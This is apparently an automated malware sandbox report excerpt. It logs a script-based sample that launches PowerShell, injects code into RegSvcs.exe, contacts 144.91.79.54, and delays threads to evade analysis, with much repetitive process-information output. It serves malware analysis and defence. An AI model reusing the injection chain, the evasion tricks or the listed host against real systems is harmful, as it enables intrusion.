                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeDropped file: Do While GHI < 10000 ' Lmite de iteraciones para demostracin WScript.Sleep 10000Jump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4737Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5138Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6253
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3472
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3065Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 916Jump to behavior
                Source: C:\Windows\System32\wscript.exe TID: 7156Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Windows\System32\wscript.exe TID: 2200Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep count: 6253 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 3472 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99124Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98686Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98573Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98462Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: wermgr.exe, 0000000E.00000002.2744565315.0000017C07A79000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000E.00000003.2732442187.0000017C07A79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
                Source: wscript.exe, 00000000.00000002.1860443892.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698784880.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860443892.0000014AD4D54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1705757894.0000014AD4D57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1705757894.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000E.00000003.2742480691.0000017C07AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: RegSvcs.exe, 0000000C.00000002.2950405030.00000000012FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161EF88 LdrInitializeThunk,LdrInitializeThunk,12_2_0161EF88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1160000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1160000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1162000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 117A000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 117C000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EE7008
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0" Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
